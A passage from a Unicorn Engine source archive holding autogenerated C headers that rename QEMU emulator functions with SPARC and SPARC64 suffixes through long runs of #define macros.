helper_fabsd_sparc #define helper_fabsq helper_fabsq_sparc #define helper_fsqrts helper_fsqrts_sparc #define helper_fsqrtd helper_fsqrtd_sparc #define helper_fsqrtq helper_fsqrtq_sparc #define helper_fcmps helper_fcmps_sparc #define helper_fcmpd helper_fcmpd_sparc #define helper_fcmpes helper_fcmpes_sparc #define helper_fcmped helper_fcmped_sparc #define helper_fcmpq helper_fcmpq_sparc #define helper_fcmpeq helper_fcmpeq_sparc #define helper_fcmps_fcc1 helper_fcmps_fcc1_sparc #define helper_fcmpd_fcc1 helper_fcmpd_fcc1_sparc #define helper_fcmpq_fcc1 helper_fcmpq_fcc1_sparc #define helper_fcmps_fcc2 helper_fcmps_fcc2_sparc #define helper_fcmpd_fcc2 helper_fcmpd_fcc2_sparc #define helper_fcmpq_fcc2 helper_fcmpq_fcc2_sparc #define helper_fcmps_fcc3 helper_fcmps_fcc3_sparc #define helper_fcmpd_fcc3 helper_fcmpd_fcc3_sparc #define helper_fcmpq_fcc3 helper_fcmpq_fcc3_sparc #define helper_fcmpes_fcc1 helper_fcmpes_fcc1_sparc #define helper_fcmped_fcc1 helper_fcmped_fcc1_sparc #define helper_fcmpeq_fcc1 helper_fcmpeq_fcc1_sparc #define helper_fcmpes_fcc2 helper_fcmpes_fcc2_sparc #define helper_fcmped_fcc2 helper_fcmped_fcc2_sparc #define helper_fcmpeq_fcc2 helper_fcmpeq_fcc2_sparc #define helper_fcmpes_fcc3 helper_fcmpes_fcc3_sparc #define helper_fcmped_fcc3 helper_fcmped_fcc3_sparc #define helper_fcmpeq_fcc3 helper_fcmpeq_fcc3_sparc #define helper_ldfsr helper_ldfsr_sparc #define helper_ldxfsr helper_ldxfsr_sparc #define cpu_raise_exception_ra cpu_raise_exception_ra_sparc #define helper_raise_exception helper_raise_exception_sparc #define helper_debug helper_debug_sparc #define helper_tick_set_count helper_tick_set_count_sparc #define helper_tick_get_count helper_tick_get_count_sparc #define helper_tick_set_limit helper_tick_set_limit_sparc #define helper_udiv helper_udiv_sparc #define helper_udiv_cc helper_udiv_cc_sparc #define helper_sdiv helper_sdiv_sparc #define helper_sdiv_cc helper_sdiv_cc_sparc #define helper_sdivx helper_sdivx_sparc #define helper_udivx helper_udivx_sparc #define helper_taddcctv helper_taddcctv_sparc #define helper_tsubcctv helper_tsubcctv_sparc #define helper_power_down helper_power_down_sparc #define sparc_cpu_do_interrupt sparc_cpu_do_interrupt_sparc #define leon3_irq_manager leon3_irq_manager_sparc #define sparc_cpu_do_interrupt sparc_cpu_do_interrupt_sparc #define cpu_tsptr cpu_tsptr_sparc #define helper_set_softint helper_set_softint_sparc #define helper_clear_softint helper_clear_softint_sparc #define helper_write_softint helper_write_softint_sparc #define helper_check_align helper_check_align_sparc #define helper_ld_asi helper_ld_asi_sparc #define helper_st_asi helper_st_asi_sparc #define sparc_cpu_do_transaction_failed sparc_cpu_do_transaction_failed_sparc #define sparc_cpu_do_unaligned_access sparc_cpu_do_unaligned_access_sparc #define sparc_cpu_tlb_fill sparc_cpu_tlb_fill_sparc #define mmu_probe mmu_probe_sparc #define sparc_cpu_memory_rw_debug sparc_cpu_memory_rw_debug_sparc #define cpu_get_phys_page_nofault cpu_get_phys_page_nofault_sparc #define sparc_cpu_get_phys_page_debug sparc_cpu_get_phys_page_debug_sparc #define gen_intermediate_code gen_intermediate_code_sparc #define sparc_tcg_init sparc_tcg_init_sparc #define restore_state_to_opc restore_state_to_opc_sparc #define cpu_set_cwp cpu_set_cwp_sparc #define cpu_get_psr cpu_get_psr_sparc #define cpu_put_psr_raw cpu_put_psr_raw_sparc #define cpu_put_psr cpu_put_psr_sparc #define cpu_cwp_inc cpu_cwp_inc_sparc #define cpu_cwp_dec cpu_cwp_dec_sparc #define helper_rett helper_rett_sparc #define helper_save helper_save_sparc #define helper_restore helper_restore_sparc #define helper_flushw helper_flushw_sparc #define helper_saved helper_saved_sparc #define helper_restored helper_restored_sparc #define helper_wrpsr helper_wrpsr_sparc #define helper_rdpsr helper_rdpsr_sparc #define cpu_get_ccr cpu_get_ccr_sparc #define cpu_put_ccr cpu_put_ccr_sparc #define cpu_get_cwp64 cpu_get_cwp64_sparc #define cpu_put_cwp64 cpu_put_cwp64_sparc #define helper_rdccr helper_rdccr_sparc #define helper_wrccr helper_wrccr_sparc #define helper_rdcwp helper_rdcwp_sparc #define helper_wrcwp helper_wrcwp_sparc #define cpu_gl_switch_gregs cpu_gl_switch_gregs_sparc #define helper_wrgl helper_wrgl_sparc #define cpu_change_pstate cpu_change_pstate_sparc #define helper_wrpstate helper_wrpstate_sparc #define helper_wrpil helper_wrpil_sparc #define helper_done helper_done_sparc #define helper_retry helper_retry_sparc #endif ������������������������������unicorn-2.1.1/qemu/sparc64.h������������������������������������������������������������������������0000664�0000000�0000000�00000237402�14675241067�0015616�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_sparc64_H #define UNICORN_AUTOGEN_sparc64_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _sparc64 #endif #define unicorn_fill_tlb unicorn_fill_tlb_sparc64 #define reg_read reg_read_sparc64 #define reg_write reg_write_sparc64 #define uc_init uc_init_sparc64 #define uc_add_inline_hook uc_add_inline_hook_sparc64 #define uc_del_inline_hook uc_del_inline_hook_sparc64 #define tb_invalidate_phys_range tb_invalidate_phys_range_sparc64 #define use_idiv_instructions use_idiv_instructions_sparc64 #define arm_arch arm_arch_sparc64 #define tb_target_set_jmp_target tb_target_set_jmp_target_sparc64 #define have_bmi1 have_bmi1_sparc64 #define have_popcnt have_popcnt_sparc64 #define have_avx1 have_avx1_sparc64 #define have_avx2 have_avx2_sparc64 #define have_isa have_isa_sparc64 #define have_altivec have_altivec_sparc64 #define have_vsx have_vsx_sparc64 #define flush_icache_range flush_icache_range_sparc64 #define s390_facilities s390_facilities_sparc64 #define tcg_dump_op tcg_dump_op_sparc64 #define tcg_dump_ops tcg_dump_ops_sparc64 #define tcg_gen_and_i64 tcg_gen_and_i64_sparc64 #define tcg_gen_discard_i64 tcg_gen_discard_i64_sparc64 #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_sparc64 #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_sparc64 #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_sparc64 #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_sparc64 #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_sparc64 #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_sparc64 #define tcg_gen_ld_i64 tcg_gen_ld_i64_sparc64 #define tcg_gen_mov_i64 tcg_gen_mov_i64_sparc64 #define tcg_gen_movi_i64 tcg_gen_movi_i64_sparc64 #define tcg_gen_mul_i64 tcg_gen_mul_i64_sparc64 #define tcg_gen_or_i64 tcg_gen_or_i64_sparc64 #define tcg_gen_sar_i64 tcg_gen_sar_i64_sparc64 #define tcg_gen_shl_i64 tcg_gen_shl_i64_sparc64 #define tcg_gen_shr_i64 tcg_gen_shr_i64_sparc64 #define tcg_gen_st_i64 tcg_gen_st_i64_sparc64 #define tcg_gen_xor_i64 tcg_gen_xor_i64_sparc64 #define cpu_icount_to_ns cpu_icount_to_ns_sparc64 #define cpu_is_stopped cpu_is_stopped_sparc64 #define cpu_get_ticks cpu_get_ticks_sparc64 #define cpu_get_clock cpu_get_clock_sparc64 #define cpu_resume cpu_resume_sparc64 #define qemu_init_vcpu qemu_init_vcpu_sparc64 #define cpu_stop_current cpu_stop_current_sparc64 #define resume_all_vcpus resume_all_vcpus_sparc64 #define vm_start vm_start_sparc64 #define address_space_dispatch_compact address_space_dispatch_compact_sparc64 #define flatview_translate flatview_translate_sparc64 #define address_space_translate_for_iotlb address_space_translate_for_iotlb_sparc64 #define qemu_get_cpu qemu_get_cpu_sparc64 #define cpu_address_space_init cpu_address_space_init_sparc64 #define cpu_get_address_space cpu_get_address_space_sparc64 #define cpu_exec_unrealizefn cpu_exec_unrealizefn_sparc64 #define cpu_exec_initfn cpu_exec_initfn_sparc64 #define cpu_exec_realizefn cpu_exec_realizefn_sparc64 #define tb_invalidate_phys_addr tb_invalidate_phys_addr_sparc64 #define cpu_watchpoint_insert cpu_watchpoint_insert_sparc64 #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_sparc64 #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_sparc64 #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_sparc64 #define cpu_breakpoint_insert cpu_breakpoint_insert_sparc64 #define cpu_breakpoint_remove cpu_breakpoint_remove_sparc64 #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_sparc64 #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_sparc64 #define cpu_abort cpu_abort_sparc64 #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_sparc64 #define memory_region_section_get_iotlb memory_region_section_get_iotlb_sparc64 #define flatview_add_to_dispatch flatview_add_to_dispatch_sparc64 #define qemu_ram_get_host_addr qemu_ram_get_host_addr_sparc64 #define qemu_ram_get_offset qemu_ram_get_offset_sparc64 #define qemu_ram_get_used_length qemu_ram_get_used_length_sparc64 #define qemu_ram_is_shared qemu_ram_is_shared_sparc64 #define qemu_ram_pagesize qemu_ram_pagesize_sparc64 #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_sparc64 #define qemu_ram_alloc qemu_ram_alloc_sparc64 #define qemu_ram_free qemu_ram_free_sparc64 #define qemu_map_ram_ptr qemu_map_ram_ptr_sparc64 #define qemu_ram_block_host_offset qemu_ram_block_host_offset_sparc64 #define qemu_ram_block_from_host qemu_ram_block_from_host_sparc64 #define qemu_ram_addr_from_host qemu_ram_addr_from_host_sparc64 #define cpu_check_watchpoint cpu_check_watchpoint_sparc64 #define iotlb_to_section iotlb_to_section_sparc64 #define address_space_dispatch_new address_space_dispatch_new_sparc64 #define address_space_dispatch_free address_space_dispatch_free_sparc64 #define flatview_read_continue flatview_read_continue_sparc64 #define address_space_read_full address_space_read_full_sparc64 #define address_space_write address_space_write_sparc64 #define address_space_rw address_space_rw_sparc64 #define cpu_physical_memory_rw cpu_physical_memory_rw_sparc64 #define address_space_write_rom address_space_write_rom_sparc64 #define cpu_flush_icache_range cpu_flush_icache_range_sparc64 #define cpu_exec_init_all cpu_exec_init_all_sparc64 #define address_space_access_valid address_space_access_valid_sparc64 #define address_space_map address_space_map_sparc64 #define address_space_unmap address_space_unmap_sparc64 #define cpu_physical_memory_map cpu_physical_memory_map_sparc64 #define cpu_physical_memory_unmap cpu_physical_memory_unmap_sparc64 #define cpu_memory_rw_debug cpu_memory_rw_debug_sparc64 #define qemu_target_page_size qemu_target_page_size_sparc64 #define qemu_target_page_bits qemu_target_page_bits_sparc64 #define qemu_target_page_bits_min qemu_target_page_bits_min_sparc64 #define target_words_bigendian target_words_bigendian_sparc64 #define cpu_physical_memory_is_io cpu_physical_memory_is_io_sparc64 #define ram_block_discard_range ram_block_discard_range_sparc64 #define ramblock_is_pmem ramblock_is_pmem_sparc64 #define page_size_init page_size_init_sparc64 #define set_preferred_target_page_bits set_preferred_target_page_bits_sparc64 #define finalize_target_page_bits finalize_target_page_bits_sparc64 #define cpu_outb cpu_outb_sparc64 #define cpu_outw cpu_outw_sparc64 #define cpu_outl cpu_outl_sparc64 #define cpu_inb cpu_inb_sparc64 #define cpu_inw cpu_inw_sparc64 #define cpu_inl cpu_inl_sparc64 #define memory_map memory_map_sparc64 #define memory_map_io memory_map_io_sparc64 #define memory_map_ptr memory_map_ptr_sparc64 #define memory_cow memory_cow_sparc64 #define memory_unmap memory_unmap_sparc64 #define memory_moveout memory_moveout_sparc64 #define memory_movein memory_movein_sparc64 #define memory_free memory_free_sparc64 #define flatview_unref flatview_unref_sparc64 #define address_space_get_flatview address_space_get_flatview_sparc64 #define memory_region_transaction_begin memory_region_transaction_begin_sparc64 #define memory_region_transaction_commit memory_region_transaction_commit_sparc64 #define memory_region_init memory_region_init_sparc64 #define memory_region_access_valid memory_region_access_valid_sparc64 #define memory_region_dispatch_read memory_region_dispatch_read_sparc64 #define memory_region_dispatch_write memory_region_dispatch_write_sparc64 #define memory_region_init_io memory_region_init_io_sparc64 #define memory_region_init_ram_ptr memory_region_init_ram_ptr_sparc64 #define memory_region_size memory_region_size_sparc64 #define memory_region_set_readonly memory_region_set_readonly_sparc64 #define memory_region_get_ram_ptr memory_region_get_ram_ptr_sparc64 #define memory_region_from_host memory_region_from_host_sparc64 #define memory_region_get_ram_addr memory_region_get_ram_addr_sparc64 #define memory_region_add_subregion memory_region_add_subregion_sparc64 #define memory_region_del_subregion memory_region_del_subregion_sparc64 #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_sparc64 #define memory_region_find memory_region_find_sparc64 #define memory_region_filter_subregions memory_region_filter_subregions_sparc64 #define memory_listener_register memory_listener_register_sparc64 #define memory_listener_unregister memory_listener_unregister_sparc64 #define address_space_remove_listeners address_space_remove_listeners_sparc64 #define address_space_init address_space_init_sparc64 #define address_space_destroy address_space_destroy_sparc64 #define memory_region_init_ram memory_region_init_ram_sparc64 #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_sparc64 #define find_memory_mapping find_memory_mapping_sparc64 #define exec_inline_op exec_inline_op_sparc64 #define floatx80_default_nan floatx80_default_nan_sparc64 #define float_raise float_raise_sparc64 #define float16_is_quiet_nan float16_is_quiet_nan_sparc64 #define float16_is_signaling_nan float16_is_signaling_nan_sparc64 #define float32_is_quiet_nan float32_is_quiet_nan_sparc64 #define float32_is_signaling_nan float32_is_signaling_nan_sparc64 #define float64_is_quiet_nan float64_is_quiet_nan_sparc64 #define float64_is_signaling_nan float64_is_signaling_nan_sparc64 #define floatx80_is_quiet_nan floatx80_is_quiet_nan_sparc64 #define floatx80_is_signaling_nan floatx80_is_signaling_nan_sparc64 #define floatx80_silence_nan floatx80_silence_nan_sparc64 #define propagateFloatx80NaN propagateFloatx80NaN_sparc64 #define float128_is_quiet_nan float128_is_quiet_nan_sparc64 #define float128_is_signaling_nan float128_is_signaling_nan_sparc64 #define float128_silence_nan float128_silence_nan_sparc64 #define float16_add float16_add_sparc64 #define float16_sub float16_sub_sparc64 #define float32_add float32_add_sparc64 #define float32_sub float32_sub_sparc64 #define float64_add float64_add_sparc64 #define float64_sub float64_sub_sparc64 #define float16_mul float16_mul_sparc64 #define float32_mul float32_mul_sparc64 #define float64_mul float64_mul_sparc64 #define float16_muladd float16_muladd_sparc64 #define float32_muladd float32_muladd_sparc64 #define float64_muladd float64_muladd_sparc64 #define float16_div float16_div_sparc64 #define float32_div float32_div_sparc64 #define float64_div float64_div_sparc64 #define float16_to_float32 float16_to_float32_sparc64 #define float16_to_float64 float16_to_float64_sparc64 #define float32_to_float16 float32_to_float16_sparc64 #define float32_to_float64 float32_to_float64_sparc64 #define float64_to_float16 float64_to_float16_sparc64 #define float64_to_float32 float64_to_float32_sparc64 #define float16_round_to_int float16_round_to_int_sparc64 #define float32_round_to_int float32_round_to_int_sparc64 #define float64_round_to_int float64_round_to_int_sparc64 #define float16_to_int16_scalbn float16_to_int16_scalbn_sparc64 #define float16_to_int32_scalbn float16_to_int32_scalbn_sparc64 #define float16_to_int64_scalbn float16_to_int64_scalbn_sparc64 #define float32_to_int16_scalbn float32_to_int16_scalbn_sparc64 #define float32_to_int32_scalbn float32_to_int32_scalbn_sparc64 #define float32_to_int64_scalbn float32_to_int64_scalbn_sparc64 #define float64_to_int16_scalbn float64_to_int16_scalbn_sparc64 #define float64_to_int32_scalbn float64_to_int32_scalbn_sparc64 #define float64_to_int64_scalbn float64_to_int64_scalbn_sparc64 #define float16_to_int16 float16_to_int16_sparc64 #define float16_to_int32 float16_to_int32_sparc64 #define float16_to_int64 float16_to_int64_sparc64 #define float32_to_int16 float32_to_int16_sparc64 #define float32_to_int32 float32_to_int32_sparc64 #define float32_to_int64 float32_to_int64_sparc64 #define float64_to_int16 float64_to_int16_sparc64 #define float64_to_int32 float64_to_int32_sparc64 #define float64_to_int64 float64_to_int64_sparc64 #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_sparc64 #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_sparc64 #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_sparc64 #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_sparc64 #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_sparc64 #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_sparc64 #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_sparc64 #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_sparc64 #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_sparc64 #define float16_to_uint16_scalbn float16_to_uint16_scalbn_sparc64 #define float16_to_uint32_scalbn float16_to_uint32_scalbn_sparc64 #define float16_to_uint64_scalbn float16_to_uint64_scalbn_sparc64 #define float32_to_uint16_scalbn float32_to_uint16_scalbn_sparc64 #define float32_to_uint32_scalbn float32_to_uint32_scalbn_sparc64 #define float32_to_uint64_scalbn float32_to_uint64_scalbn_sparc64 #define float64_to_uint16_scalbn float64_to_uint16_scalbn_sparc64 #define float64_to_uint32_scalbn float64_to_uint32_scalbn_sparc64 #define float64_to_uint64_scalbn float64_to_uint64_scalbn_sparc64 #define float16_to_uint16 float16_to_uint16_sparc64 #define float16_to_uint32 float16_to_uint32_sparc64 #define float16_to_uint64 float16_to_uint64_sparc64 #define float32_to_uint16 float32_to_uint16_sparc64 #define float32_to_uint32 float32_to_uint32_sparc64 #define float32_to_uint64 float32_to_uint64_sparc64 #define float64_to_uint16 float64_to_uint16_sparc64 #define float64_to_uint32 float64_to_uint32_sparc64 #define float64_to_uint64 float64_to_uint64_sparc64 #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_sparc64 #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_sparc64 #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_sparc64 #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_sparc64 #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_sparc64 #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_sparc64 #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_sparc64 #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_sparc64 #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_sparc64 #define int64_to_float16_scalbn int64_to_float16_scalbn_sparc64 #define int32_to_float16_scalbn int32_to_float16_scalbn_sparc64 #define int16_to_float16_scalbn int16_to_float16_scalbn_sparc64 #define int64_to_float16 int64_to_float16_sparc64 #define int32_to_float16 int32_to_float16_sparc64 #define int16_to_float16 int16_to_float16_sparc64 #define int64_to_float32_scalbn int64_to_float32_scalbn_sparc64 #define int32_to_float32_scalbn int32_to_float32_scalbn_sparc64 #define int16_to_float32_scalbn int16_to_float32_scalbn_sparc64 #define int64_to_float32 int64_to_float32_sparc64 #define int32_to_float32 int32_to_float32_sparc64 #define int16_to_float32 int16_to_float32_sparc64 #define int64_to_float64_scalbn int64_to_float64_scalbn_sparc64 #define int32_to_float64_scalbn int32_to_float64_scalbn_sparc64 #define int16_to_float64_scalbn int16_to_float64_scalbn_sparc64 #define int64_to_float64 int64_to_float64_sparc64 #define int32_to_float64 int32_to_float64_sparc64 #define int16_to_float64 int16_to_float64_sparc64 #define uint64_to_float16_scalbn uint64_to_float16_scalbn_sparc64 #define uint32_to_float16_scalbn uint32_to_float16_scalbn_sparc64 #define uint16_to_float16_scalbn uint16_to_float16_scalbn_sparc64 #define uint64_to_float16 uint64_to_float16_sparc64 #define uint32_to_float16 uint32_to_float16_sparc64 #define uint16_to_float16 uint16_to_float16_sparc64 #define uint64_to_float32_scalbn uint64_to_float32_scalbn_sparc64 #define uint32_to_float32_scalbn uint32_to_float32_scalbn_sparc64 #define uint16_to_float32_scalbn uint16_to_float32_scalbn_sparc64 #define uint64_to_float32 uint64_to_float32_sparc64 #define uint32_to_float32 uint32_to_float32_sparc64 #define uint16_to_float32 uint16_to_float32_sparc64 #define uint64_to_float64_scalbn uint64_to_float64_scalbn_sparc64 #define uint32_to_float64_scalbn uint32_to_float64_scalbn_sparc64 #define uint16_to_float64_scalbn uint16_to_float64_scalbn_sparc64 #define uint64_to_float64 uint64_to_float64_sparc64 #define uint32_to_float64 uint32_to_float64_sparc64 #define uint16_to_float64 uint16_to_float64_sparc64 #define float16_min float16_min_sparc64 #define float16_minnum float16_minnum_sparc64 #define float16_minnummag float16_minnummag_sparc64 #define float16_max float16_max_sparc64 #define float16_maxnum float16_maxnum_sparc64 #define float16_maxnummag float16_maxnummag_sparc64 #define float32_min float32_min_sparc64 #define float32_minnum float32_minnum_sparc64 #define float32_minnummag float32_minnummag_sparc64 #define float32_max float32_max_sparc64 #define float32_maxnum float32_maxnum_sparc64 #define float32_maxnummag float32_maxnummag_sparc64 #define float64_min float64_min_sparc64 #define float64_minnum float64_minnum_sparc64 #define float64_minnummag float64_minnummag_sparc64 #define float64_max float64_max_sparc64 #define float64_maxnum float64_maxnum_sparc64 #define float64_maxnummag float64_maxnummag_sparc64 #define float16_compare float16_compare_sparc64 #define float16_compare_quiet float16_compare_quiet_sparc64 #define float32_compare float32_compare_sparc64 #define float32_compare_quiet float32_compare_quiet_sparc64 #define float64_compare float64_compare_sparc64 #define float64_compare_quiet float64_compare_quiet_sparc64 #define float16_scalbn float16_scalbn_sparc64 #define float32_scalbn float32_scalbn_sparc64 #define float64_scalbn float64_scalbn_sparc64 #define float16_sqrt float16_sqrt_sparc64 #define float32_sqrt float32_sqrt_sparc64 #define float64_sqrt float64_sqrt_sparc64 #define float16_default_nan float16_default_nan_sparc64 #define float32_default_nan float32_default_nan_sparc64 #define float64_default_nan float64_default_nan_sparc64 #define float128_default_nan float128_default_nan_sparc64 #define float16_silence_nan float16_silence_nan_sparc64 #define float32_silence_nan float32_silence_nan_sparc64 #define float64_silence_nan float64_silence_nan_sparc64 #define float16_squash_input_denormal float16_squash_input_denormal_sparc64 #define float32_squash_input_denormal float32_squash_input_denormal_sparc64 #define float64_squash_input_denormal float64_squash_input_denormal_sparc64 #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_sparc64 #define roundAndPackFloatx80 roundAndPackFloatx80_sparc64 #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_sparc64 #define int32_to_floatx80 int32_to_floatx80_sparc64 #define int32_to_float128 int32_to_float128_sparc64 #define int64_to_floatx80 int64_to_floatx80_sparc64 #define int64_to_float128 int64_to_float128_sparc64 #define uint64_to_float128 uint64_to_float128_sparc64 #define float32_to_floatx80 float32_to_floatx80_sparc64 #define float32_to_float128 float32_to_float128_sparc64 #define float32_rem float32_rem_sparc64 #define float32_exp2 float32_exp2_sparc64 #define float32_log2 float32_log2_sparc64 #define float32_eq float32_eq_sparc64 #define float32_le float32_le_sparc64 #define float32_lt float32_lt_sparc64 #define float32_unordered float32_unordered_sparc64 #define float32_eq_quiet float32_eq_quiet_sparc64 #define float32_le_quiet float32_le_quiet_sparc64 #define float32_lt_quiet float32_lt_quiet_sparc64 #define float32_unordered_quiet float32_unordered_quiet_sparc64 #define float64_to_floatx80 float64_to_floatx80_sparc64 #define float64_to_float128 float64_to_float128_sparc64 #define float64_rem float64_rem_sparc64 #define float64_log2 float64_log2_sparc64 #define float64_eq float64_eq_sparc64 #define float64_le float64_le_sparc64 #define float64_lt float64_lt_sparc64 #define float64_unordered float64_unordered_sparc64 #define float64_eq_quiet float64_eq_quiet_sparc64 #define float64_le_quiet float64_le_quiet_sparc64 #define float64_lt_quiet float64_lt_quiet_sparc64 #define float64_unordered_quiet float64_unordered_quiet_sparc64 #define floatx80_to_int32 floatx80_to_int32_sparc64 #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_sparc64 #define floatx80_to_int64 floatx80_to_int64_sparc64 #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_sparc64 #define floatx80_to_float32 floatx80_to_float32_sparc64 #define floatx80_to_float64 floatx80_to_float64_sparc64 #define floatx80_to_float128 floatx80_to_float128_sparc64 #define floatx80_round floatx80_round_sparc64 #define floatx80_round_to_int floatx80_round_to_int_sparc64 #define floatx80_add floatx80_add_sparc64 #define floatx80_sub floatx80_sub_sparc64 #define floatx80_mul floatx80_mul_sparc64 #define floatx80_div floatx80_div_sparc64 #define floatx80_rem floatx80_rem_sparc64 #define floatx80_sqrt floatx80_sqrt_sparc64 #define floatx80_eq floatx80_eq_sparc64 #define floatx80_le floatx80_le_sparc64 #define floatx80_lt floatx80_lt_sparc64 #define floatx80_unordered floatx80_unordered_sparc64 #define floatx80_eq_quiet floatx80_eq_quiet_sparc64 #define floatx80_le_quiet floatx80_le_quiet_sparc64 #define floatx80_lt_quiet floatx80_lt_quiet_sparc64 #define floatx80_unordered_quiet floatx80_unordered_quiet_sparc64 #define float128_to_int32 float128_to_int32_sparc64 #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_sparc64 #define float128_to_int64 float128_to_int64_sparc64 #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_sparc64 #define float128_to_uint64 float128_to_uint64_sparc64 #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_sparc64 #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_sparc64 #define float128_to_uint32 float128_to_uint32_sparc64 #define float128_to_float32 float128_to_float32_sparc64 #define float128_to_float64 float128_to_float64_sparc64 #define float128_to_floatx80 float128_to_floatx80_sparc64 #define float128_round_to_int float128_round_to_int_sparc64 #define float128_add float128_add_sparc64 #define float128_sub float128_sub_sparc64 #define float128_mul float128_mul_sparc64 #define float128_div float128_div_sparc64 #define float128_rem float128_rem_sparc64 #define float128_sqrt float128_sqrt_sparc64 #define float128_eq float128_eq_sparc64 #define float128_le float128_le_sparc64 #define float128_lt float128_lt_sparc64 #define float128_unordered float128_unordered_sparc64 #define float128_eq_quiet float128_eq_quiet_sparc64 #define float128_le_quiet float128_le_quiet_sparc64 #define float128_lt_quiet float128_lt_quiet_sparc64 #define float128_unordered_quiet float128_unordered_quiet_sparc64 #define floatx80_compare floatx80_compare_sparc64 #define floatx80_compare_quiet floatx80_compare_quiet_sparc64 #define float128_compare float128_compare_sparc64 #define float128_compare_quiet float128_compare_quiet_sparc64 #define floatx80_scalbn floatx80_scalbn_sparc64 #define float128_scalbn float128_scalbn_sparc64 #define softfloat_init softfloat_init_sparc64 #define tcg_optimize tcg_optimize_sparc64 #define gen_new_label gen_new_label_sparc64 #define tcg_can_emit_vec_op tcg_can_emit_vec_op_sparc64 #define tcg_expand_vec_op tcg_expand_vec_op_sparc64 #define tcg_register_jit tcg_register_jit_sparc64 #define tcg_tb_insert tcg_tb_insert_sparc64 #define tcg_tb_remove tcg_tb_remove_sparc64 #define tcg_tb_lookup tcg_tb_lookup_sparc64 #define tcg_tb_foreach tcg_tb_foreach_sparc64 #define tcg_nb_tbs tcg_nb_tbs_sparc64 #define tcg_region_reset_all tcg_region_reset_all_sparc64 #define tcg_region_init tcg_region_init_sparc64 #define tcg_code_size tcg_code_size_sparc64 #define tcg_code_capacity tcg_code_capacity_sparc64 #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_sparc64 #define tcg_malloc_internal tcg_malloc_internal_sparc64 #define tcg_pool_reset tcg_pool_reset_sparc64 #define tcg_context_init tcg_context_init_sparc64 #define tcg_tb_alloc tcg_tb_alloc_sparc64 #define tcg_prologue_init tcg_prologue_init_sparc64 #define tcg_func_start tcg_func_start_sparc64 #define tcg_set_frame tcg_set_frame_sparc64 #define tcg_global_mem_new_internal tcg_global_mem_new_internal_sparc64 #define tcg_temp_new_internal tcg_temp_new_internal_sparc64 #define tcg_temp_new_vec tcg_temp_new_vec_sparc64 #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_sparc64 #define tcg_temp_free_internal tcg_temp_free_internal_sparc64 #define tcg_const_i32 tcg_const_i32_sparc64 #define tcg_const_i64 tcg_const_i64_sparc64 #define tcg_const_local_i32 tcg_const_local_i32_sparc64 #define tcg_const_local_i64 tcg_const_local_i64_sparc64 #define tcg_op_supported tcg_op_supported_sparc64 #define tcg_gen_callN tcg_gen_callN_sparc64 #define tcg_op_remove tcg_op_remove_sparc64 #define tcg_emit_op tcg_emit_op_sparc64 #define tcg_op_insert_before tcg_op_insert_before_sparc64 #define tcg_op_insert_after tcg_op_insert_after_sparc64 #define tcg_cpu_exec_time tcg_cpu_exec_time_sparc64 #define tcg_gen_code tcg_gen_code_sparc64 #define tcg_gen_op1 tcg_gen_op1_sparc64 #define tcg_gen_op2 tcg_gen_op2_sparc64 #define tcg_gen_op3 tcg_gen_op3_sparc64 #define tcg_gen_op4 tcg_gen_op4_sparc64 #define tcg_gen_op5 tcg_gen_op5_sparc64 #define tcg_gen_op6 tcg_gen_op6_sparc64 #define tcg_gen_mb tcg_gen_mb_sparc64 #define tcg_gen_addi_i32 tcg_gen_addi_i32_sparc64 #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_sparc64 #define tcg_gen_subi_i32 tcg_gen_subi_i32_sparc64 #define tcg_gen_andi_i32 tcg_gen_andi_i32_sparc64 #define tcg_gen_ori_i32 tcg_gen_ori_i32_sparc64 #define tcg_gen_xori_i32 tcg_gen_xori_i32_sparc64 #define tcg_gen_shli_i32 tcg_gen_shli_i32_sparc64 #define tcg_gen_shri_i32 tcg_gen_shri_i32_sparc64 #define 